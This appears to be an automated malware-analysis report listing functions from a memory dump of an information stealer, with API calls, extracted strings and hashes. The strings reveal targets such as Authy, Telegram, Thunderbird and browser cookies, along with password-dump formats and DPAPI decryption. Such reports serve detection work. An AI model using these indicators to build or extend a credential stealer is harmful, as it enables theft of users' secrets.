\*.*, xrefs: 00405E4B
Xsd, xrefs: 0040623F
Htd, xrefs: 004065B1
`td, xrefs: 00406601
0td, xrefs: 0040644B
8ud, xrefs: 0040635B
psd, xrefs: 00406421

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memset$lstrcat$Find$Filelstrcpy$Closelstrcmp$DeleteFirstMatchNextPathSpec
String ID: 0td$8ud$Htd$Xsd$\*.*$`td$psd$Td$sd
API String ID: 3848687369-2252592319
Opcode ID: 6cad5bc072cd729c1e8cc620c0ec3e83e7fad7e18ecc2f1e51177a7a20cde3b0
Instruction ID: 7b06f2fceb2252125254fc1a4124f666c6ba20ad71130c1cd262667204b1b2e7
Opcode Fuzzy Hash: 6cad5bc072cd729c1e8cc620c0ec3e83e7fad7e18ecc2f1e51177a7a20cde3b0
Instruction Fuzzy Hash: 2B7206B11043409FD724DF24CC44EABBBE9EF85354F044A2FF58A932A1DB349949CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041F2B3, Relevance: 60.1, APIs: 10, Strings: 24, Instructions: 635COMMON

Download Yara Rule

APIs

__wgetenv.LIBCMT ref: 0041F2B8
__wgetenv.LIBCMT ref: 0041F3CA

Part of subcall function 00404F50: _memmove.LIBCMT ref: 00404F8B

__wgetenv.LIBCMT ref: 0041F4F5

Part of subcall function 00403370: std::_Xinvalid_argument.LIBCPMT ref: 0040338A

Strings

\Telegram Desktop\, xrefs: 0041FA58
h[d, xrefs: 0041F7B8
Xc, xrefs: 0041F3F9, 0041F518
Thunderbird, xrefs: 0041F99E
\Thunderbird\Profiles\, xrefs: 0041F9A3
Xd, xrefs: 0041F7E1
D877F783D5D3EF8C*, xrefs: 0041FAA5
HXd, xrefs: 0041F656
CryptoTab Browser, xrefs: 0041F920
(Zd, xrefs: 0041F87E
key_datas, xrefs: 0041FA8F
([d, xrefs: 0041F85B
map*, xrefs: 0041FABB
Vd, xrefs: 0041F752
LOCALAPPDATA, xrefs: 0041F3C5, 0041F4F0
Yd, xrefs: 0041F767
X<l, xrefs: 0041F67C
APPDATA, xrefs: 0041F2B3, 0041FA0F
hZd, xrefs: 0041F898
*.cookie, xrefs: 0041F495
*.txt, xrefs: 0041F37A, 0041F5A6
\CryptoTab Browser\User Data\, xrefs: 0041F925
H[d, xrefs: 0041F7CC
HZd, xrefs: 0041F334

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __wgetenv$Xinvalid_argument_memmovestd::_
String ID: (Zd$([d$*.cookie$*.txt$APPDATA$CryptoTab Browser$D877F783D5D3EF8C*$HXd$HZd$H[d$LOCALAPPDATA$Thunderbird$X<l$Xc$\CryptoTab Browser\User Data\$\Telegram Desktop\$\Thunderbird\Profiles\$hZd$h[d$key_datas$map*$Vd$Xd$Yd
API String ID: 1276473186-1234304876
Opcode ID: d0612efc65e0708066db695481a7885536529c7067f67cb2ee2de3bb0a3684d8
Instruction ID: a850e75b82a1deda930a36618c9c8f743ea22d7438283ce5cd403e82495a625c
Opcode Fuzzy Hash: d0612efc65e0708066db695481a7885536529c7067f67cb2ee2de3bb0a3684d8
Instruction Fuzzy Hash: 9432FAB1605340AFC704EF25DC919AB7BEAABC8704F00452FF44A473A1DB79D948CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040F150, Relevance: 53.9, APIs: 16, Strings: 14, Instructions: 1371COMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 0040F1B6
_strtok.LIBCMT ref: 0040F2D5
_memmove.LIBCMT ref: 0040F44F
_memmove.LIBCMT ref: 0040F4F8
__wgetenv.LIBCMT ref: 0040F5CC
_memmove.LIBCMT ref: 0040F681
__wgetenv.LIBCMT ref: 0040F70B
_memmove.LIBCMT ref: 0040F7C1

Strings

.zip, xrefs: 0040FC95
\Desktop, xrefs: 0040F868
%LOCALAPPDATA%, xrefs: 0040F6C9, 0040F6F6
C:\Users\, xrefs: 0040F3F9, 0040F856, 0040FA71
LOCALAPPDATA, xrefs: 0040F702
%APPDATA%, xrefs: 0040F58A, 0040F5B7
APPDATA, xrefs: 0040F5C3
%DESKTOP%, xrefs: 0040F809, 0040F836
%C%, xrefs: 00410003, 00410071
%DRIVE_FIXED%, xrefs: 0040FD1B, 0040FD57
C:\, xrefs: 00410026
\Documents, xrefs: 0040FA83
%DRIVE_REMOVABLE%, xrefs: 0040FE90, 0040FECA
%DOCUMENTS%, xrefs: 0040FA24, 0040FA51

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove$__wgetenv_strtok
String ID: %APPDATA%$%C%$%DESKTOP%$%DOCUMENTS%$%DRIVE_FIXED%$%DRIVE_REMOVABLE%$%LOCALAPPDATA%$.zip$APPDATA$C:\$C:\Users\$LOCALAPPDATA$\Desktop$\Documents
API String ID: 2886921687-2603015269
Opcode ID: 0fac09c6864896ae0603e0ec4b2c34d2487282c4432ea78b1da1b6e6485cbe22
Instruction ID: c5c6a9cebdb3dcf9c7b1e5a866b1b53ec0f068330fa0c5c4d79c97b60811631e
Opcode Fuzzy Hash: 0fac09c6864896ae0603e0ec4b2c34d2487282c4432ea78b1da1b6e6485cbe22
Instruction Fuzzy Hash: FCC2E3B0900384EFDF20DF68C845BEE7BB5AF15308F14457EE8495B282D7399649CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0041A730, Relevance: 40.5, APIs: 16, Strings: 7, Instructions: 254libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(006CCD78), ref: 0041A75E
GetProcAddress.KERNEL32(00000000,006CCC58), ref: 0041A781
GetProcAddress.KERNEL32(00000000,006CCC40), ref: 0041A790
GetProcAddress.KERNEL32(00000000,00645668), ref: 0041A79E
GetProcAddress.KERNEL32(00000000,006CCB80), ref: 0041A7AD
GetProcAddress.KERNEL32(00000000,006CCB98), ref: 0041A7BC
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 0041A8CF
_fprintf.LIBCMT ref: 0041A8DC
WideCharToMultiByte.KERNEL32(00000000,00000000,-00000018,000000FF,?,00000100,00000000,00000000), ref: 0041A8FE
_fprintf.LIBCMT ref: 0041A90E
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 0041A930
_fprintf.LIBCMT ref: 0041A940
_fprintf.LIBCMT ref: 0041A972
FreeLibrary.KERNEL32(00000000), ref: 0041AA1D

Strings

Login: %s, xrefs: 0041A93A
hVd, xrefs: 0041A797
Password: , xrefs: 0041A96C
Password: %s, xrefs: 0041A9A4
Soft: %s, xrefs: 0041A8D6
passwords.txt, xrefs: 0041A847
Host: %s, xrefs: 0041A908

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$_fprintf$ByteCharMultiWide$Library$FreeLoad
String ID: Host: %s$Login: %s$Password: $Password: %s$Soft: %s$hVd$passwords.txt
API String ID: 2724868727-4221023093
Opcode ID: 8aba8f26673e2174ece65196d2b077e3ac54928c0dbb36443b71c2d3ed3d9f09
Instruction ID: 23f77417df16c4eb790a0015b1ad9e47605991ff2ee3690580b371aaa372450c
Opcode Fuzzy Hash: 8aba8f26673e2174ece65196d2b077e3ac54928c0dbb36443b71c2d3ed3d9f09
Instruction Fuzzy Hash: BD81A3B1905304AFC710DFA5DC85DAFBBECEB89704F014A2FF54592281E774A984CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0041DBF0, Relevance: 35.8, APIs: 18, Strings: 2, Instructions: 772COMMON

Download Yara Rule

APIs

Part of subcall function 00496670: FindFirstFileW.KERNEL32(00000000,?,?,?,77EF155D), ref: 004966EC
Part of subcall function 00496670: FindNextFileW.KERNEL32(?,?), ref: 0049679B

Part of subcall function 004962D0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000001,?,004966DA,?,?,77EF155D), ref: 004962FB
Part of subcall function 004962D0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0049632E

Part of subcall function 00415EA0: std::_Lockit::_Lockit.LIBCPMT ref: 00415EBC

Part of subcall function 004185F0: std::_Lockit::_Lockit.LIBCPMT ref: 0041861C
Part of subcall function 004185F0: std::_Lockit::_Lockit.LIBCPMT ref: 00418642

std::_Lockit::_Lockit.LIBCPMT ref: 0041DE91
_memmove.LIBCMT ref: 0041E05D
_fprintf.LIBCMT ref: 0041E0AA
_fprintf.LIBCMT ref: 0041E0B5
_fprintf.LIBCMT ref: 0041E0C0
_memmove.LIBCMT ref: 0041E130
_fprintf.LIBCMT ref: 0041E181
_fprintf.LIBCMT ref: 0041E18C
_fprintf.LIBCMT ref: 0041E1D4
_fprintf.LIBCMT ref: 0041E213
_fprintf.LIBCMT ref: 0041E22E
_fprintf.LIBCMT ref: 0041E239
_fprintf.LIBCMT ref: 0041E257
_fprintf.LIBCMT ref: 0041E262
_fprintf.LIBCMT ref: 0041E285
_fprintf.LIBCMT ref: 0041E290
std::_Lockit::_Lockit.LIBCPMT ref: 0041E50E
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0041E593

Part of subcall function 0049B347: std::ios_base::_Tidy.LIBCPMT ref: 0049B368

Strings

TK, xrefs: 0041E56A
FALSE, xrefs: 0041E0AF, 0041E186, 0041E20D

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _fprintf$LockitLockit::_std::_$ByteCharFileFindMultiWide_memmovestd::ios_base::_$FirstIos_base_dtorNextTidy
String ID: FALSE$TK
API String ID: 1373035807-3658482967
Opcode ID: 599436ea63115ce880228ae16bbfb53d94c066e9344344da74b222bd434eb523
Instruction ID: 62a3aa233642b21d3fcff5de88d84bf0d7ae202760ec1fb673875ef54a847a4e
Opcode Fuzzy Hash: 599436ea63115ce880228ae16bbfb53d94c066e9344344da74b222bd434eb523
Instruction Fuzzy Hash: 5C626AB1D00228DBDF20DF55C881BDEBBB5BF55704F1041AEE40967281EB786A85CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041E780, Relevance: 30.4, APIs: 7, Strings: 10, Instructions: 692fileCOMMON

Download Yara Rule

APIs

__wgetenv.LIBCMT ref: 0041E7C4
CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?), ref: 0041E8B5
CopyFileW.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0041EA53
CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?), ref: 0041EDD2
CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 0041EE03
CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 0041E8E6

Part of subcall function 00495AB0: WideCharToMultiByte.KERNEL32(00000000,00000000,0041DD3D,C4840000,00000000,00000000,00000000,00000000,0000000F,00000000,?,00000010,?,0041DD3D,?), ref: 00495ADF
Part of subcall function 00495AB0: WideCharToMultiByte.KERNEL32(00000000,00000000,0041DD3D,C4840000,00000000,00000000,00000000,00000000,000000FF,?,?), ref: 00495B06

Part of subcall function 004962D0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000001,?,004966DA,?,?,77EF155D), ref: 004962FB
Part of subcall function 004962D0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0049632E

CopyFileW.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0041EF6F

Strings

APPDATA, xrefs: 0041E7BB
files\Soft\AuthyNew, xrefs: 0041EE1A
\files\Soft\AuthyNew, xrefs: 0041EDE7
files\Soft\Authy, xrefs: 0041E8FD
\Authy Desktop\Local Storage\leveldb\*, xrefs: 0041EC8D
\files\Soft\Authy, xrefs: 0041E8CA
\files\Soft, xrefs: 0041E886, 0041EDA3
\Authy Desktop\Local Storage\*.localstorage, xrefs: 0041E810
\Authy Desktop\Local Storage\leveldb\, xrefs: 0041EF05
\Authy Desktop\Local Storage\, xrefs: 0041E9E5

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharCreateDirectoryMultiWide$CopyFile$__wgetenv
String ID: APPDATA$\Authy Desktop\Local Storage\$\Authy Desktop\Local Storage\*.localstorage$\Authy Desktop\Local Storage\leveldb\$\Authy Desktop\Local Storage\leveldb\*$\files\Soft$\files\Soft\Authy$\files\Soft\AuthyNew$files\Soft\Authy$files\Soft\AuthyNew
API String ID: 3009452187-1538576089
Opcode ID: 7ce4290dd04d6d6139153d2096a74dc4aca068b8c9d02a6b9c8b636a25f90f57
Instruction ID: 9fffadf4525bd2c083ac333686a87e8656e275cf3915418a7255b7888ec7fd12
Opcode Fuzzy Hash: 7ce4290dd04d6d6139153d2096a74dc4aca068b8c9d02a6b9c8b636a25f90f57
Instruction Fuzzy Hash: 42524BB1808380DBD730EF65C881BDBBBE9AF89704F444D2EE58947241EB799544CBA7

Uniqueness

Uniqueness Score: -1.00%

Function 0041B810, Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 276fileCOMMON

Download Yara Rule

APIs

__wgetenv.LIBCMT ref: 0041B88D
_sprintf.LIBCMT ref: 0041B8DA
FindFirstFileA.KERNELBASE(?,?), ref: 0041B8F2

Strings

%s\%s, xrefs: 0041B9CD, 0041BA19
%s\*, xrefs: 0041B8CC

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileFindFirst__wgetenv_sprintf
String ID: %s\%s$%s\*
API String ID: 3517639957-2848263008
Opcode ID: 055a8c2aac4adb0a5436a0476902567b16a76576aaa833a5fc7e3241545f1fd2
Instruction ID: e84d73e01692a937fcb8278ce23769cccc62f2ad9502f447513b42af3e95e1a5
Opcode Fuzzy Hash: 055a8c2aac4adb0a5436a0476902567b16a76576aaa833a5fc7e3241545f1fd2
Instruction Fuzzy Hash: EFB195B15083809FD720DF60C881AEBB7E9EB95704F444D2EF18947241E7799548CBAB

Uniqueness

Uniqueness Score: -1.00%

Function 0040EB20, Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 213fileCOMMON

Download Yara Rule

APIs

_sprintf.LIBCMT ref: 0040EB8B
FindFirstFileA.KERNELBASE(?,?), ref: 0040EBA0
_sprintf.LIBCMT ref: 0040EC57
_sprintf.LIBCMT ref: 0040EC83
PathMatchSpecA.SHLWAPI(?,?), ref: 0040ECB4
CopyFileA.KERNEL32(?,?,00000001), ref: 0040ED32

Strings

%s\%s, xrefs: 0040EC51, 0040EC9D
%s\*, xrefs: 0040EB7C

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _sprintf$File$CopyFindFirstMatchPathSpec
String ID: %s\%s$%s\*
API String ID: 1073797228-2848263008
Opcode ID: 7c51ff1c78bb79323afe99da5676c7f2d6818d4d01a20724473318cabff47a0a
Instruction ID: 3cd559b57765f387816ded045f179eb8af0ae6fe739494d685eafc44d7bda6f5
Opcode Fuzzy Hash: 7c51ff1c78bb79323afe99da5676c7f2d6818d4d01a20724473318cabff47a0a
Instruction Fuzzy Hash: 2681A5B25083809BD730DF61C881AABB7E9EF95314F444D2FF18997281E779D508CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00410340, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 156networkfileCOMMON

Download Yara Rule

APIs

DeleteUrlCacheEntry.WININET(?), ref: 004103B8
DeleteUrlCacheEntry.WININET(00000000), ref: 004103DF
InternetOpenA.WININET(004BB6C4,00000000,00000000,00000000,00000000), ref: 00410401
InternetConnectA.WININET(00000000,?,000001BB,00000000,00000000,00000003,04800000,00000000), ref: 0041043C
HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,04800000,00000000), ref: 00410474
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00410489
InternetReadFile.WININET(00000000,?,000007FF,?), ref: 004104A3
InternetCloseHandle.WININET(00000000), ref: 004104B3
InternetCloseHandle.WININET(00000000), ref: 004104BA
InternetCloseHandle.WININET(00000000), ref: 004104C1

Strings

GET, xrefs: 0041046E

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Internet$CloseHandle$CacheDeleteEntryHttpOpenRequest$ConnectFileReadSend
String ID: GET
API String ID: 2421845749-1805413626
Opcode ID: d78caac32a6031125b95a6080af71cf986807d58e7994e79d10f012c794aeacd
Instruction ID: 7cf1307f9db5e9878ae89d0e043f20ff73eb375528e1574c33e1e4af38b135ab
Opcode Fuzzy Hash: d78caac32a6031125b95a6080af71cf986807d58e7994e79d10f012c794aeacd
Instruction Fuzzy Hash: D751B271609344ABD731DB10DC45B9BB7E8FB89700F104A2EF58997280DFB9A440CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 00492480, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 181memoryCOMMON

Download Yara Rule

APIs

GetKeyboardLayoutList.USER32 ref: 004924ED
LocalAlloc.KERNEL32(00000040,00000000), ref: 004924FF
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 0049250B
GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200), ref: 00492535
_memmove.LIBCMT ref: 004925A3
_memmove.LIBCMT ref: 00492635
_memset.LIBCMT ref: 00492681
LocalFree.KERNEL32(00000000), ref: 0049269D

Strings

/ , xrefs: 00492549

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: KeyboardLayoutListLocal_memmove$AllocFreeInfoLocale_memset
String ID: /
API String ID: 3901162126-4001269591
Opcode ID: dde0f57af63dbf9b5205601e7f3d1e1e3b3575b87c653cad2582487f8bd16fa6
Instruction ID: ca32fba6e0dd625b902435190d65c0a9c2a1543b9c3712984430e5707a9dd001
Opcode Fuzzy Hash: dde0f57af63dbf9b5205601e7f3d1e1e3b3575b87c653cad2582487f8bd16fa6
Instruction Fuzzy Hash: 3061AFB0505701EFD720DF29D984A2BBBF8FF99314F500A3EE08983641D779A944CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0041B590, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 211fileCOMMON

Download Yara Rule

APIs

_sprintf.LIBCMT ref: 0041B5E1
FindFirstFileA.KERNEL32(?,?), ref: 0041B5F6
_sprintf.LIBCMT ref: 0041B69A
FindNextFileA.KERNELBASE(?,?), ref: 0041B7D5
FindClose.KERNEL32(?), ref: 0041B7E8

Strings

%s\%s, xrefs: 0041B694
History, xrefs: 0041B714
%s\*, xrefs: 0041B5D7

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Find$File_sprintf$CloseFirstNext
String ID: %s\%s$%s\*$History
API String ID: 3618621783-2206966733
Opcode ID: a0267599da6da25de1cf93bebbb4305a1068f3deeb62d77cefc894d8a37989b6
Instruction ID: 76b2ec8c38971f12c3d8284c9000f53bcfef7d449bd0c5e41967c9f326c288b4
Opcode Fuzzy Hash: a0267599da6da25de1cf93bebbb4305a1068f3deeb62d77cefc894d8a37989b6
Instruction Fuzzy Hash: 6261B5B25083446BC320DB61DC81EEB7BADEFDA744F04491EF59582241E736E648C7B6

Uniqueness

Uniqueness Score: -1.00%

Function 00417000, Relevance: 10.6, APIs: 7, Instructions: 90processCOMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0041702D

Part of subcall function 0049E04E: __FF_MSGBANNER.LIBCMT ref: 0049E067
Part of subcall function 0049E04E: __NMSG_WRITE.LIBCMT ref: 0049E06E
Part of subcall function 0049E04E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,004A0B2E,00000000,00000001,00000000,?,004A75C4,00000018,004CF090,0000000C,004A7654), ref: 0049E093

CreateToolhelp32Snapshot.KERNEL32 ref: 00417043
CloseHandle.KERNEL32(00000000), ref: 00417053
Process32First.KERNEL32(00000000,?), ref: 00417066
Process32Next.KERNEL32 ref: 00417075
Process32Next.KERNEL32 ref: 004170E2
CloseHandle.KERNEL32(00000000,00000000,?), ref: 004170EC

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Process32$CloseHandleNext$AllocateCreateFirstHeapSnapshotToolhelp32_malloc
String ID:
API String ID: 3797447157-0
Opcode ID: f6acf83e9653c5c1deaabf58b2d682177618f5160c3cfd122d724bda4fed03d8
Instruction ID: 2135836d77798f9c50604d49f3f72542c4dc93c97459f83ae6fef5a1776cfb42
Opcode Fuzzy Hash: f6acf83e9653c5c1deaabf58b2d682177618f5160c3cfd122d724bda4fed03d8
Instruction Fuzzy Hash: B33122716083405BD720DF219D41BEB7FE8AF99344F04052EF98897241EB3ED909C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 00413270, Relevance: 8.1, APIs: 5, Instructions: 568fileCOMMON

Download Yara Rule

APIs

__wgetenv.LIBCMT ref: 004132E0
__wgetenv.LIBCMT ref: 00413300
_memmove.LIBCMT ref: 0041348D
CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?,?,?,00000000), ref: 004136CB

Part of subcall function 004962D0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000001,?,004966DA,?,?,77EF155D), ref: 004962FB
Part of subcall function 004962D0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0049632E

CopyFileW.KERNEL32(00000000,00000000,00000001), ref: 00413846

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharMultiWide__wgetenv$CopyCreateDirectoryFile_memmove
String ID:
API String ID: 2457873499-0
Opcode ID: 6b191416ec0f5539c53d3b12fb1fda3b3936cd743089bef5e0407085d973174b
Instruction ID: f0c70720498cf02b519b062bc8fa08eb36b6b8b758df70b0d8f6ea38b47e292c
Opcode Fuzzy Hash: 6b191416ec0f5539c53d3b12fb1fda3b3936cd743089bef5e0407085d973174b
Instruction Fuzzy Hash: CA326BB1809380DBD731EF65C485BDBBBE5AF99304F44492EE18D43201EB799548CBAB

Uniqueness

Uniqueness Score: -1.00%

Function 00492360, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32 ref: 004923C4
GetTimeZoneInformation.KERNEL32(?), ref: 004923CF
TzSpecificLocalTimeToSystemTime.KERNEL32(?,?,?), ref: 004923FC

Strings

UTC, xrefs: 00492429

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Time$System$InformationLocalSpecificZone
String ID: UTC
API String ID: 1716759327-2754919731
Opcode ID: 8daca3fe7f7afe76af06b8b478628c01a36bce74609ce7b4dd640e931eba343b
Instruction ID: d59f1eb0f8becfbe52156457f42bd622178f558e25b76293156a555318c4f0b3
Opcode Fuzzy Hash: 8daca3fe7f7afe76af06b8b478628c01a36bce74609ce7b4dd640e931eba343b
Instruction Fuzzy Hash: 1D3136B1518341DBD324CF68D941BABBBF8FF98700F004A2EF49A92240E7749508CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00416200, Relevance: 6.0, APIs: 4, Instructions: 46memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00416228
LocalAlloc.KERNEL32(00000040,?), ref: 00416242
_memmove.LIBCMT ref: 0041625B
LocalFree.KERNEL32(?), ref: 00416269

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect_memmove
String ID:
API String ID: 3008826695-0
Opcode ID: 9033348c2b4a09912b7d5fcfa6d4a98c593b9d1b89790f492a46d76eb77ae559
Instruction ID: d33bcd860eec39be862b12614f406f2b613f285aa91fc56981d17521ed732d33
Opcode Fuzzy Hash: 9033348c2b4a09912b7d5fcfa6d4a98c593b9d1b89790f492a46d76eb77ae559
Instruction Fuzzy Hash: AC014075604301ABD300DF58DC45B6B77E9EBC8B04F14895DF9849B290DA74D844CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00496670, Relevance: 4.6, APIs: 3, Instructions: 145fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004962D0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000001,?,004966DA,?,?,77EF155D), ref: 004962FB
Part of subcall function 004962D0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0049632E

FindFirstFileW.KERNEL32(00000000,?,?,?,77EF155D), ref: 004966EC
FindNextFileW.KERNEL32(?,?), ref: 0049679B
FindNextFileW.KERNEL32(?,?,?,?,?), ref: 00496829

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileFind$ByteCharMultiNextWide$First
String ID:
API String ID: 1501163664-0
Opcode ID: d917b43fba4d8f33674cf65e126e6d7e10101edb8951a24cc533958845b5fdc1
Instruction ID: 0d2b8d864ed86e80172c5fe242d0e61fb55c426dd9a101164f238c3e4891137a
Opcode Fuzzy Hash: d917b43fba4d8f33674cf65e126e6d7e10101edb8951a24cc533958845b5fdc1
Instruction Fuzzy Hash: B9518DB15083819BDB20DF65C985A9BBBE8FFD8304F454A2EF48983250EB78E504CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00498990, Relevance: 4.6, APIs: 3, Instructions: 121fileCOMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004989E1
_memmove.LIBCMT ref: 00498A91
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,?,0049902E,?,00000000,?,00004000,?,00000000,?), ref: 00498AB5

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove$FileWrite
String ID:
API String ID: 726942401-0
Opcode ID: 970404c3248238a53c225fdcc5212f8772c3b77359bab869b313737b9643a948
Instruction ID: 986d0415b1d1014c74def0908bc7bc2070a4c2b2779cb8c7359b06e8e5ea05ed
Opcode Fuzzy Hash: 970404c3248238a53c225fdcc5212f8772c3b77359bab869b313737b9643a948
Instruction Fuzzy Hash: 2D41BDB2600B019BC768DF19D980A27BBE9FBD5310B54493FE48387A41D639F405CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0044E950, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(004D4224,00000000,00462DAF,?,?,?,?,?,?), ref: 0044E985

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 65adae5f8bfe4fee9032333fefd55fc3f2d6cb7609ae2e93eb03c802d01f919e
Instruction ID: ff61be3a33aee084a537e90de765e6727d4fb5985f9e6136672ec7b91c2a4201
Opcode Fuzzy Hash: 65adae5f8bfe4fee9032333fefd55fc3f2d6cb7609ae2e93eb03c802d01f919e
Instruction Fuzzy Hash: 71218DB0903621AFE750DF6ABD4921A37E4BB44744B04417BEC05E6376F33858048B8E

Uniqueness

Uniqueness Score: -1.00%

Function 00491AC0, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32 ref: 00491AF6

Memory Dump Source

Source File: 00000001.00000002.277774021.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: fbd7f1f31775140c2410dfef175017acd0f32cf79ceab7fe4c8529fcaa8b23d5
Instruction ID: 31d172919f5a663b823a1a99c2b3aa783a5a2d09b84c0491761752d047d5da8e
Opcode Fuzzy Hash: fbd7f1f31775140c2410dfef175017acd0f32cf79ceab7fe4c8529fcaa8b23d5
Instruction Fuzzy Hash: EB0162711043019FD720DF14D454BEBBBE4EB95304F008A1EE4C987250EBB89548CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 00410B86, Relevance: 197.8, APIs: 43, Strings: 69, Instructions: 1813sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00414C90: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,00000000,751881D0,0040524C,?,00000000), ref: 00414CB7

CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?), ref: 00410FC2
CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00411002
CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411042
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0041108F
